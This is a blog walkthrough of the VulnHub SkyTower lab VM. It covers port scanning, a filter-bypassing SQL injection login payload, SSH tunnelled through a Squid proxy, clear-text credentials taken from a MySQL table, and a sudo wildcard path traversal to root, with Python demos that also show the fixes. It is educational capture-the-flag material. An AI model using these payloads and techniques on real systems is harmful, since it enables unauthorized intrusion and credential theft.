SkyTower

Setup

Attacker (Kali): 192.168.146.128

VulnHub link: https://www.vulnhub.com/entry/skytower-1,96/

VM network: NAT

Enumeration

Host Enumeration

Use arp-scan to find the VM's IP address on the local segment: sudo arp-scan -l

The box's IP is 192.168.146.136

Port Enumeration

Port enumeration with nmap (version detection plus the default script set, output saved to nmap.txt): nmap -T4 -sV -sC -oN nmap.txt 192.168.146.136

Nmap scan report for 192.168.146.136
Host is up (0.0013s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.20

The scan gives three things to work with:

22: SSH is filtered, meaning something is dropping or rejecting our packets before they reach the service
80: an Apache 2.2.22 web server
3128: a Squid 3.1.20 HTTP proxy

HTTP Enumeration

Use dirsearch to brute-force directories and files (responses with 4xx/5xx status codes are excluded):

dirsearch -u http://192.168.146.136 -x 400-599 -t 100 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

Nothing special turned up, so check the website in a browser, starting with port 80:

It is a login page, so the next steps are password brute-forcing and testing for SQL injection.

Foothold

Testing the login form on port 80 with password brute-forcing and SQL injection turned up an injection in the login fields, and the page it returns leaks an SSH username and password.

A plain ' or 1=1# does not work: the form strips the string "or" from the input before building the query, and the error message it returns (the "prompt message" in the notes below) shows what was removed. Doubling the keyword survives the single-pass filter, so the working payload is:

SQLi payload: a'oorr 1=1#

The credentials it revealed:

Username: john
Password: hereisjohn
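The filter bypass above is easier to see with the vulnerable query and its filter side by side. The following is an added example, not code from the walkthrough or from the SkyTower VM: the blacklist filter, the one-account SQLite table and the username/password values are constructed here (the real box runs MySQL, so the demo emulates MySQL's # comment), and the filter is assumed to delete the substring "or" in a single pass, which is the behaviour the a'oorr payload relies on. The parameterised version shows why no blacklist is needed once user input stops being part of the SQL text.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the SkyTower login database (one account).
    The real box runs MySQL; SQLite is used so the demo runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES ('john', 'hereisjohn')")
    conn.commit()
    return conn


def naive_filter(value):
    """Assumed blacklist filter: delete the substring 'or' in one
    left-to-right pass, like PHP's str_replace. 'oorr' therefore collapses
    to 'or' after filtering, which is what makes the page's payload work."""
    return value.replace("or", "")


def vulnerable_login(conn, username, password):
    """The bug: filtered input is concatenated straight into the query.
    Returns the matched username, or None when nothing matches or the query
    is malformed (the error case the filter causes for a plain ' or 1=1#)."""
    username, password = naive_filter(username), naive_filter(password)
    sql = (f"SELECT username FROM login "
           f"WHERE username='{username}' AND password='{password}'")
    # MySQL treats '#' as a line comment; SQLite does not, so emulate it here.
    sql = sql.split("#", 1)[0]
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return None
    return row[0] if row else None


def safe_login(conn, username, password):
    """The fix: a parameterised query. A quote in the input can never end the
    string literal, so no filter is needed (real code would also compare a
    password hash rather than storing the clear-text password)."""
    row = conn.execute(
        "SELECT username FROM login WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for payload in ("a'or 1=1#", "a'oorr 1=1#"):
        print(f"{payload!r:14} filtered to {naive_filter(payload)!r:12} "
              f"vulnerable -> {vulnerable_login(db, payload, 'x')}  "
              f"safe -> {safe_login(db, payload, 'x')}")
```

Running it shows the plain payload collapsing to a' 1=1, which is a syntax error (the same kind of error the real form displayed), while a'oorr 1=1# becomes a'or 1=1 and logs in as john; the parameterised query rejects both.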

But as the port scan showed, port 22 is filtered, so a direct SSH connection is not possible.

There is, however, the Squid proxy on port 3128. Pointing proxychains at it lets the SSH client reach port 22 through the proxy: an HTTP proxy's CONNECT method tunnels arbitrary TCP, and this Squid instance permits it to port 22.

Add the proxy to the ProxyList section of /etc/proxychains4.conf as an http proxy entry for 192.168.146.136 on port 3128:

Then SSH to the target as john with the client run under proxychains4:

It worked, and john's shell is the foothold.
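To make clear what proxychains does with that config line, here is an added example (not part of the walkthrough) that performs the same HTTP CONNECT handshake by hand and reads the SSH banner that comes back through the tunnel. The request builder and response parser run offline; ssh_banner_via_proxy needs the lab network, and the proxy and target addresses under __main__ are the ones from this page. The sample proxy responses used to illustrate parsing are constructed.

```python
import socket


def build_connect_request(target_host, target_port):
    """What proxychains sends for an 'http' proxy entry: an HTTP CONNECT asking
    the proxy to open a raw TCP tunnel to target_host:target_port."""
    return (f"CONNECT {target_host}:{target_port} HTTP/1.1\r\n"
            f"Host: {target_host}:{target_port}\r\n\r\n").encode()


def parse_connect_response(data):
    """Return (status_code, leftover). Bytes after the blank line that ends the
    proxy's headers already belong to the tunnel; for SSH that is the server
    banner, which the server sends without waiting for the client."""
    head, sep, rest = data.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete proxy response")
    parts = head.split(b"\r\n", 1)[0].split()
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        raise ValueError(f"not an HTTP status line: {head[:40]!r}")
    return int(parts[1]), rest


def ssh_banner_via_proxy(proxy_host, proxy_port, target_host, target_port=22,
                         timeout=5):
    """Open the tunnel and return the SSH banner line, or None if the proxy
    refuses the CONNECT (Squid answers 403 when its ACLs deny the port)."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(build_connect_request(target_host, target_port))
        buf = b""
        while b"\r\n\r\n" not in buf:
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("proxy closed the connection")
            buf += chunk
        code, rest = parse_connect_response(buf)
        if code != 200:
            return None
        while b"\n" not in rest:
            chunk = s.recv(4096)
            if not chunk:
                break
            rest += chunk
        return rest.split(b"\n", 1)[0].rstrip(b"\r").decode(errors="replace")


if __name__ == "__main__":
    # Addresses from the walkthrough; this needs the lab network to be reachable.
    print(ssh_banner_via_proxy("192.168.146.136", 3128, "192.168.146.136"))
```

A banner starting with SSH-2.0 confirms the proxy will carry the connection, which is exactly the condition proxychains4 ssh john@192.168.146.136 depends on; a 403 means the proxy's ACLs block that port and a different pivot is needed.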

Privilege Escalation

Since the web application uses MySQL, the next place to look is the web root under /var/www/ for anything useful, such as the database password in the application's configuration.

Sure enough, the MySQL credentials were sitting there in clear text: root:root.

Authenticating to MySQL with them:

Listing the databases, selecting SkyTech, listing its tables and dumping the table that holds user accounts gave clear-text passwords:

The accounts recovered from the table:

john:hereisjohn
sara:ihatethisjob
william:senseable

john's access is already in hand, so test sara and william over SSH (again through the proxy). sara's password works:

(william's login fails)

Check what sara may run with sudo -l:

sara is allowed to run cat as root, but only with an argument under /accounts.

The catch is that the allowed path is written as the wildcard /accounts/*. sudo matches arguments with shell-style globbing in which * also matches /, so /accounts/../root/flag.txt still satisfies the rule and cat runs as root on a file outside the intended directory. That traversal could be used in several ways to reach root; here sudo cat /accounts/../root/flag.txt is enough, because the flag contains the root password:

Logging in as root with it gives full access.
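The following is an added example, not from the walkthrough, that reproduces the matching behind that escalation and the check a hardened wrapper would add. The sudoers line for sara is assumed to be /bin/cat /accounts/* (the page shows only that cat is permitted on /accounts/*), the file names are constructed, and sudoers_allows only approximates sudo's argument matching: sudo compares each argument with fnmatch(3) without FNM_PATHNAME, so * spans /, which is also how Python's fnmatch behaves.

```python
import fnmatch
import posixpath


def sudoers_allows(spec, argv):
    """Approximate sudo's matching of a sudoers command spec such as
    '/bin/cat /accounts/*' against the argv the user ran. Each argument is
    compared with fnmatch, where '*' also matches '/', so a '..' component
    inside the wildcard slips through."""
    spec_parts = spec.split()
    if len(spec_parts) != len(argv):
        return False
    return all(fnmatch.fnmatchcase(arg, pat)
               for pat, arg in zip(spec_parts, argv))


def confined_to(directory, path):
    """The check the wildcard skips: normalise away '..' and require the
    result to stay below the intended directory. normpath keeps the demo
    offline; a real wrapper should use os.path.realpath so a symlink planted
    inside the directory cannot escape either (assumed hardening, not from
    the page)."""
    base = posixpath.normpath(directory)
    target = posixpath.normpath(path)
    return target == base or target.startswith(base.rstrip("/") + "/")


if __name__ == "__main__":
    rule = "/bin/cat /accounts/*"  # assumed sudoers command spec for sara
    for cmd in (["/bin/cat", "/accounts/sara.txt"],
                ["/bin/cat", "/accounts/../root/flag.txt"],
                ["/bin/cat", "/etc/shadow"]):
        print(f"{' '.join(cmd):40} sudoers: {sudoers_allows(rule, cmd)!s:5} "
              f"confined: {confined_to('/accounts', cmd[1])}")
```

The second row is the SkyTower case: the sudoers rule accepts /accounts/../root/flag.txt while the path check rejects it. The sudoers fix is to avoid wildcards in arguments altogether (list the permitted files explicitly, or grant a small script that applies a check like confined_to before calling cat).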

Key Learnings From this BOX

  • When a SQL injection payload is filtered, read the error or prompt message the application returns and adapt the payload to what the filter actually removes instead of abandoning the vector.
  • Once SSH credentials are in hand but a direct connection to port 22 is impossible, check whether a proxy service on the box (here Squid on 3128) can be used to reach it.
  • After gaining a shell, if the web application talks to a database, go to the web directory and read its configuration files for the database credentials; passwords found there are often reused for other accounts.
Author: z0sen
Copyright notice: Unless otherwise stated, all articles on this site are licensed under CC BY-NC-SA 4.0. Please credit z0sen's Blog when reposting.
Tags: Walkthrough, Linux, VulnHub